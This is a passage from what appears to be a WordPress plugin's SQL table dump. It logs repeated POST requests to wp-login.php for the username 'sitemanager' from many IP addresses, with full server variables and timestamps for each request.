Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46614\";s:11:\"REMOTE_ADDR\";s:14:\"116.204.78.140\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745484038.4109149;s:12:\"REQUEST_TIME\";i:1745484038;}}','116.204.78.140',0,'2025-04-24 14:10:40','1970-01-01 00:00:00'),(94084,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39878\";s:11:\"REMOTE_ADDR\";s:13:\"120.24.23.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745484431.554759;s:12:\"REQUEST_TIME\";i:1745484431;}}','120.24.23.234',0,'2025-04-24 14:17:13','1970-01-01 00:00:00'),(94085,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46620\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.100\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745484825.1873519;s:12:\"REQUEST_TIME\";i:1745484825;}}','198.54.125.100',0,'2025-04-24 14:23:47','1970-01-01 00:00:00'),(94086,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55598\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745485218.7685039;s:12:\"REQUEST_TIME\";i:1745485218;}}','192.64.117.43',0,'2025-04-24 14:30:20','1970-01-01 00:00:00'),(94087,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60458\";s:11:\"REMOTE_ADDR\";s:14:\"103.186.185.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745485612.900075;s:12:\"REQUEST_TIME\";i:1745485612;}}','103.186.185.28',0,'2025-04-24 14:36:54','1970-01-01 00:00:00'),(94088,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35014\";s:11:\"REMOTE_ADDR\";s:11:\"78.135.87.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745486006.2377999;s:12:\"REQUEST_TIME\";i:1745486006;}}','78.135.87.2',0,'2025-04-24 14:43:28','1970-01-01 00:00:00'),(94089,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42324\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745486801.475718;s:12:\"REQUEST_TIME\";i:1745486801;}}','195.26.245.159',0,'2025-04-24 14:56:43','1970-01-01 00:00:00'),(94090,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53490\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.205.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745487192.4058261;s:12:\"REQUEST_TIME\";i:1745487192;}}','199.188.205.3',0,'2025-04-24 15:03:14','1970-01-01 00:00:00'),(94091,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43722\";s:11:\"REMOTE_ADDR\";s:13:\"162.241.92.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745487576.1397319;s:12:\"REQUEST_TIME\";i:1745487576;}}','162.241.92.55',0,'2025-04-24 15:09:38','1970-01-01 00:00:00'),(94092,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59552\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.222\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745487959.735517;s:12:\"REQUEST_TIME\";i:1745487959;}}','66.29.141.222',0,'2025-04-24 15:16:01','1970-01-01 00:00:00'),(94093,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45690\";s:11:\"REMOTE_ADDR\";s:13:\"104.219.248.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745488344.0433209;s:12:\"REQUEST_TIME\";i:1745488344;}}','104.219.248.2',0,'2025-04-24 15:22:25','1970-01-01 